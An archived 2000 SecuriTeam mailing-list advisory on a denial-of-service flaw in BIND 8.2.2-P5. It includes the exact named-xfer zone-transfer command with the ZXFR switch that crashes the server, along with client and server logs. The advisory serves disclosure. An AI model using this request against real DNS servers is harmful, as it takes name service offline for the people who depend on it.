Date: Thu, 9 Nov 2000 07:52:52 +0100 (CET)
Mailing-List: contact list-help@xxxxxxxxxxxxxx; run by ezmlm
X-No-Archive: yes
list-help: <mailto:list-help@xxxxxxxxxxxxxx>
list-unsubscribe: <mailto:list-unsubscribe@xxxxxxxxxxxxxx>
list-post: <mailto:list@xxxxxxxxxxxxxx>
Delivered-To: moderator for list@xxxxxxxxxxxxxx
From: support@xxxxxxxxxxxxxx
To: list@xxxxxxxxxxxxxx
Subject: [EXPL] BIND 8.2.2-P5 DoS vulnerability (exploit, BIND_ZXFR)
The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
BIND 8.2.2-P5 DoS vulnerability (exploit, BIND_ZXFR)
------------------------------------------------------------------------
SUMMARY
A security vulnerability in BIND was discovered. The bug involves a
problem with the ZXFR feature - if the BIND_ZXFR feature has been
disabled, sending someone a request for a zone transfer may cause the BIND
DNS server to crash.
DETAILS
Vulnerable systems:
BIND 8.2.2-P5
Exploit:
We'll transfer the zone zone.example.com from the DNS server
dns.example.com (192.168.1.1) from the host attacker.example.org
(10.10.10.10). This will actually crash the server.
We will send a Zone Transfer request using "-Z" switch, meaning we wish to
use ZXFR. dns.example.com doesn't support ZXFR and have "allow-transfer{}"
not configured, so everyone can ask him for *.zone.example.com.
$ ./named-xfer -z zone.example.com -d 9 -f pics -Z dns.example.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.example.com"
On the server's log:
Nov 7 11:19:09 dns.example.com: named[188510]: approved ZXFR from
[10.10.10.10].2284 for "zone.example.com"
Nov 7 11:19:09 dns.example.com: named[188510]: unsupported XFR (type
ZXFR) of "zone.example.com" (IN) to [10.10.10.10].2284
The server then crashes.
ADDITIONAL INFORMATION
The information has been provided by <mailto:fabio@xxxxxxxxxxx> Fabio
Pietrosanti (naif).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.